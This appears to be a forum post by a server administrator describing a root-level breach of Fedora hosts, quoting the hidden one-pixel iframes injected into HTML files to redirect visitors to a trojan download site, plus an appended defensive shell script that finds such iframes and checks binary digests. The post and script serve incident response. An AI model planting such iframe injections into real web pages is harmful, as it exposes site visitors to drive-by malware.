Recently we experienced a massive security breach on our Fedora servers.
Unfortunately there was no clear indication of how they broke in.
Affected were fc1, fc3, fc4 and fc5.
Everything indicates that the attackers got root access.
It started approximately Jan 5.
Hosts were running:
the latest sendmail, named, spamassassin, sshd, gnu-pop3d from rpm
the latest apache 1.3 + php4, pure-ftpd-1.0.21 compiled from source
The visible results were the following:
- To the end of all *htm* (or all index*) files was added:
<iframe src='hxxp://statrafongon.biz/strong/167/' width=1 height=1></iframe>
<iframe src='hxxp://statrafongon.biz/adv/new.php?adv=167' width=1 height=1></iframe>
(tt=xx to break the URL validity) - the link above leads to a site serving a trojan download page based on the latest win32 VML vulnerability.
It's hosted on telcove.com premises, and an attempt to get telcove to shut down this server didn't work out.
- all files kept their original user ownership but had a different timestamp
- nothing suspicious in the logs except the usual ssh banging
- no suspicious files anywhere on the filesystem
- On one of the fc3 hosts, sshd stopped accepting public-key authentication, with a funny message in /var/log/secure:
sshd: error: key_read: uudecode .... (key source here) ...
This brought me to the conclusion that sshd was possibly trojaned.
A quick comparison shows:
Fedora Core release 3 (Heidelberg)
-rwxr-xr-x 1 root root 280336 Jan 12 17:47 sshd
-rwxr-xr-x 1 root root 285944 Sep 7 2005 sshd.old
sshd.old is the version that gives the funny messages... rpm reports the correct version (sshd was copied directly from a clean server).
However, this key problem is only on one server.
Fedora Core release 1 (Yarrow)
-rwxr-xr-x 1 root root 281112 Sep 17 2003 sshd
-rwxr-xr-x 1 root root 286636 Sep 17 2003 sshd
I don't have many fc4 and fc5 installations to come up with the check right away.
Same goes for rh72 and rh9.
(That sounds like a really paranoid assumption, but after the last 5 days and nights I wouldn't be surprised.)
A quick scan of all the servers gave a mixed picture - rpm reported the latest version, which is openssh-3.9p1-8.0.3.
Sizes vary as shown above.
A quick strings scan and comparison didn't give any additional information - I assume that the trojaned version allows root login without
logging and without a password.
If somebody has experienced the same problem or has any bit of useful information regarding this, please contact me.
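As an added example (not code from the original post), here is a small POSIX shell script for the two checks the post is doing by hand: finding the *htm*/index* files that carry a one-pixel hidden iframe, and comparing a suspect binary against a digest taken from a clean server. The sample web root, the stand-in "sshd" files, the `.clean` suffix and the file names are all constructed for the demo and are my assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post. Two checks for the
# symptoms described above: (1) list HTML files carrying a one-pixel
# <iframe> like the injected ones, (2) compare a suspect binary's digest
# against a known-good copy taken from a clean server. The web root and
# "binaries" below are constructed here for the demo (assumed names).
set -u

# List every *htm* or index* file under $1 containing an <iframe ...>
# whose attributes include width=1 and height=1 (the injected pattern).
find_injected_iframes() {
    find "$1" -type f \( -name '*htm*' -o -name 'index*' \) \
        -exec grep -lEi "<iframe[^>]*width=['\"]?1['\"]?[^>]*height=['\"]?1['\"]?" {} + \
        2>/dev/null || true
}

# SHA-256 of a file, using whichever tool the host has.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Succeed only if $1 has the expected digest $2 (recorded on a clean host).
# On a rooted box the rpm binary and its database may have been replaced
# too, so the reference digest must come from somewhere the intruder
# could not touch.
verify_binary() {
    [ "$(digest "$1")" = "$2" ]
}

# --- constructed demo data (not from any real server) -------------------
demo_root=$(mktemp -d)
trap 'rm -rf "$demo_root"' EXIT
mkdir -p "$demo_root/www" "$demo_root/bin"

printf '<html><body>about</body></html>\n' > "$demo_root/www/about.htm"
printf '<html><body>home</body></html>\n'  > "$demo_root/www/index.html"
printf '<?php echo 1; ?>\n'                > "$demo_root/www/page.php"
# Append the injected line as the post shows it (URL defanged with hxxp).
printf "<iframe src='hxxp://statrafongon.biz/strong/167/' width=1 height=1></iframe>\n" \
    >> "$demo_root/www/index.html"

# Stand-ins for a clean sshd (copied from a known-good host) and the
# suspect one: same role, different contents.
printf 'clean sshd image\n'   > "$demo_root/bin/sshd.clean"
printf 'suspect sshd image\n' > "$demo_root/bin/sshd"
good_digest=$(digest "$demo_root/bin/sshd.clean")

echo "Files with hidden iframes:"
find_injected_iframes "$demo_root/www"
if verify_binary "$demo_root/bin/sshd" "$good_digest"; then
    echo "sshd matches the clean copy"
else
    echo "sshd DIFFERS from the clean copy: $(digest "$demo_root/bin/sshd") vs $good_digest"
fi
```

On the real hosts, `rpm -Vf /usr/sbin/sshd` (or `rpm -V openssh-server`) is the quicker first pass, since it checks the installed file's size, digest and mtime against the package database; the digest comparison above is what you fall back to when, as in this post, the intruder had root and the rpm database itself can no longer be trusted.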